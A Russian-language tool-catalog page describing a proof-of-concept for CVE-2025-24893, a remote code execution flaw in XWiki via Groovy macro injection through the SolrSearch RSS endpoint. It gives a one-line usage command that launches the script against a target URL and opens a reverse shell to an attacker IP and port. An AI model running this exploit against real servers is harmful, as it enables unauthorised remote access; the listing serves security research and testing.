Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893-Reverse-Shell — Полезная нагрузка Reverse Shell для CVE-2025-24893 | Kitploit
Инструменты/GitHubGitHub/azureadtrent/cve-2025-24893-reverse-shell
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubazureadtrent/cve-2025-24893-reverse-shell

CVE-2025-24893-Reverse-Shell

Полезная нагрузка Reverse Shell для CVE-2025-24893

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

CVE-2025-24893 - Эксплоит удаленного выполнения кода XWiki

PoC для CVE-2025-24893 – удаленное выполнение кода через макрос <groovy> XWiki
Вдохновлено оригинальным PoC от Artemir


Описание

Это эксплоит в виде доказательства концепции (PoC) для CVE-2025-24893 — уязвимости удаленного выполнения кода (RCE) в уязвимых версиях XWiki.

Проблема заключается в неправильной санитизации пользовательского ввода в конечной точке SolrSearch, которая уязвима для внедрения незащищенного макроса <groovy> через запрос RSS-ленты.

Этот скрипт внедряет полезную нагрузку Groovy с помощью макроса async, что приводит к выполнению команд на сервере, позволяя атакующему инициировать обратную оболочку на свою систему.


Использование

root@kitploit:~
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>
Скачать инструмент